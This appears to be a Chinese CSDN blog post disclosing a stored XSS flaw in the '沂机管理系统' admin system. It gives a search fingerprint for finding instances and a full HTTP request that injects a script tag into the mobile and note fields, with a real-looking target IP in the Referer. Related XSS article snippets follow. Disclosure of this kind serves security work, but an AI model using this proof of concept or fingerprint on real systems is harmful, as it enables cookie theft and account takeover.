沂机管理系统存在存储型XSS漏洞

已于 2024-10-01 20:30:00 修改
阅读量50 收藏
点赞数
文章标签: ajax sql 前端
于 2024-10-01 20:23:40 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77012231/article/details/142674263
版权
漏洞描述

沂机管理系统存在存储型XSS漏洞,窃取用户Cookie获取用户信息

漏洞复现
body="后台管理系统演示版"

POC

GET /data/Ajax.aspx?method=user_save&frandom=0.15233733802978144&FCloud_OrgID=1&FCloud_UserID=167636&FCloud_EmpID=110243&froleid=105&fid=1319&fnumber=liuzk&fname=%E5%88%98%E6%8C%AF%E7%A7%91&fmobile=%3Cscript%3Ealert(1)%3C%2Fscript%3E&fnote=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 Edg/129.0.0.0
Accept: */*
X-Requested-With: XMLHttpRequest
Referer: http://221.2.93.215:8091/basedata/user.aspx?fid=1319&moduleid=101&frandom=0.4487488038893439
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: ASP.NET_SessionId=d2dkwvksddxsvejtgqmh3oe3; pfbs_Login_compid=1001
Connection: keep-alive

 

成功弹窗

马船长
关注
zzcms2019存储xss漏洞审计(超详细)
Cvjark的博客
03-27 1120
存储xss漏洞复现 function stripfxg($string,$htmlspecialchars_decode=false,$nl2br=false) { $string=stripslashes($string); if ($htmlspecialchars_decode==true){ $string=htmlspecialchars_decode($string);//转html实体符号 } if ($nl2br==true){ $string=nl2br($
Dvwa之存储XSS攻击全级别学习笔记
Mbys_Lettuce的博客
09-19 2018
和好像被过滤掉了,会不会像反射一样,只是过滤了,只要复写或者大小写可以攻击了呢?把写入内容修改成alert(document.cookie)或者alert(document.cookie)
XSS漏洞-存储漏洞案例
dragon的博客
03-08 594
在github上找DVWA的靶机环境。
Web安全基础学习:XSS跨站脚本漏洞存储XSS
qq_51862722的博客
06-19 1187
存储XSS漏洞:指像留言板、用户名称、日志信息等一些会存储在服务器端的信息,当攻击者在存在存储XSS漏洞的功能点进行注入之后,任何浏览器端加载该信息的时候都会将其中的恶意代码解析,进而触发XSS攻击。该方法甚至可以在管理员审核留言或查看系统信息时触发,进而造成管理员敏感信息的泄露。因为其存储在服务器端,因此造成的危险程度、攻击范围比反射更大更广。留言板、评论区、用户头像、个性签名、登录日志、博客等。
信呼协同办公系统-存储XSS漏洞
chaojixiaojingang
09-20 1965
1.影响版本 1.9.0-1.9.1版本 2.漏洞复现 (1)搭建完成,进入登陆界面 (2)输入刚开始安装时设置的管理员usname paword,点击登陆,然后抓包查看传参,再去寻找登陆模块的源代码,根据传参的追踪,我们很快就能追踪到这个文件“webmain\model\loginMode.php”,在这个登陆文件loginMode.php的第209行到215行发现了addlogs()函数 (3)之后在logModel.php中发现了addlog()函数的定义 (4)这里是获取了信
XSS漏洞详解
m0_60571990的博客
11-27 4374
XSS漏洞详解
存储XSS攻击:原理、示例与防御策略
weixin_43822401的博客
05-31 1006
存储XSS作为XSS的一种,其特点是恶意脚本被存储在目标服务器上,这使得攻击具有更高的隐蔽性和持久性。当网站未能对用户输入进行适当的清理和转义时,恶意脚本便被存储在网站的数据库或文件系统中。当其他用户浏览这个帖子时,他们的浏览器会将帖子内容作为HTML解析,恶意脚本随之被执行,可能会弹出警告框或执行其他恶意操作。其他用户访问包含恶意脚本的页面时,由于网站未能对输出数据进行编码或过滤,恶意脚本在用户的浏览器中被执行,导致攻击发生。对所有用户输入进行严格的验证,确保不包含潜在的恶意脚本。
信安小白,一篇博文讲明白存储、反射XSS漏洞
.G();的博客
10-24 3667
靶机系统:win7 存储、反射XSS漏洞一、DVWA 靶机二、XSS1. 判断是否存在XSS漏洞2. XSS攻击窃取cookie2.1 cookie为什么产生?2.2 cookie作用机制2.3 存储XSS攻击窃取cookie2.4 中级存储XSS攻击(防御代码)3. 反射XSS漏洞3.1 反射XSS漏洞实验3.2 中级、高级反射XSS攻击3.2.1 中级反射XSS攻击防御与绕过3.2.2 高级级反射XSS攻击防御与绕过3.3 总结4. 提出防御方案 一、DVWA 靶机   旨在为安全
反射存储XSS漏洞利用
a_helloworlds的博客
04-09 2811
反射XSS利用过程 1. 恶意的攻击者发给受害者一个链接(链接中携带xss代码) 2. 攻击者诱使受害者点开这个链接 3. XSS代码被提交到有XSS漏洞的Web应用程序上 4. WEB应用程序没有过滤提交上来的数据,或者过滤不严格。 5. WEB应用程序输出用户提交上来的数据(包含XSS代码)。 6. 用户浏览器渲染返回的HTML页面...
(华科企业网站管理系统)hkqyglxt-含有存储XSS漏洞的源码包.rar
03-24
【标题】"(华科企业网站管理系统)hkqyglxt-含有存储XSS漏洞的源码包.rar" 暴露了重要的网络安全问题,主要关注的是存储跨站脚本( Stored XSS漏洞。这个标题暗示了该源码包在设计时存在一个关键的安全缺陷,...
YXcms-含有存储XSS漏洞的源码包
03-17
综上所述,YXcms源码包中存在存储XSS漏洞是一个严重的安全问题,开发者在使用时应高度重视,采取必要的安全措施,以保护用户的数据安全。同时,这也提醒我们在使用开源软件时,要时刻关注安全更新,及时修补漏洞...
DedeCMS 存储xss漏洞1
08-03
在本文中,我们将深入探讨一个特定的存储 XSS(跨站脚本)漏洞,该漏洞存在于DedeCMS 的会员功能组件 `shops_delivery.php` 中的 `des` 参数。 ### 漏洞概述 这个存储 XSS 漏洞允许攻击者通过注入恶意脚本到 `...
YXcms-含有存储XSS漏洞的源码包(1).zip
12-31
YXcms是一个常见的内容管理系统,但在这个特定的版本——"YXcms-含有存储XSS漏洞的源码包(1).zip"中,存在一个严重的安全问题:存储跨站脚本(Stored Cross-Site Scripting,简称存储XSS漏洞。这种漏洞允许...
ourphp存储xss漏洞1
08-03
OurPHP存储XSS漏洞详解 OurPHP是一个由哈尔滨伟成科技有限公司开发的PHP内容管理系统,主要用于构建网站。在OurPHP 1.7.3版本中发现了一个存储跨站脚本(XSS漏洞,这给系统的安全性带来了严重威胁。存储XSS...
VUE 开发——AJAX学习(一)
weixin_74113429的博客
09-25 980
异步的javascript和XML,就是使用XMLHttp Request对象与服务器通信,浏览器和服务器进行数据交换的技术。语法:http://xxxx.com/xxx/xxx?1.请求报文:浏览器按照HTTP协议要求的格式,发送给服务器的内容,可以在网络中查看。3.URL查询参数:浏览器提供给服务器的额外信息,让服务器返回浏览器想要的数据。接口:使用AJAX和服务器通讯时,使用的URL,请求方法,以及参数。1.定义:统一资源定位符,简称网址,用于访问网络上的资源。URL:协议://域名/资源路径。
详解Ajax与axios的区别
weixin_56187723的博客
09-22 1158
Ajax与Axios在Web开发中都是用于发送HTTP请求的技术,但它们在多个方面存在显著的差异。
VUE 开发——AJAX学习(二)
weixin_74113429的博客
09-26 443
异步代码:调用后耗时,不阻塞代码继续执行(不必原地等待),在将来完成后触发一个回调函数;Promise:用于表示一个异步操作的最终完成(或失败)及其结果值。Promise对象一旦被兑现/拒绝,就是已敲定,状态无法再被改变。待定(pending):初始状态,既没有被兑现,也没有被拒绝。同步代码:逐行执行,需原地等待结果后,才继续向下执行。成功调用:resolve(值)触发then()执行。失败调用:reject(值)触发catch()执行。功能:不离开当前页面,显示单独内容,供用户操作。
sql server每天定时执行sql语句
最新发布
doubleintfloat的博客
09-27 402
2、鼠标右击【SQL Server 代理】,选择【启动(S)】,如已启动,可以省略此步骤;3、右键,新建-》作业,在作业上-》新建作业,然后在作业上右键-》属性。1、打开SQL Server Management Studio。结果如下 , 定时每个10秒向数据库里插入一条数据。作业名称,数据库语句。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值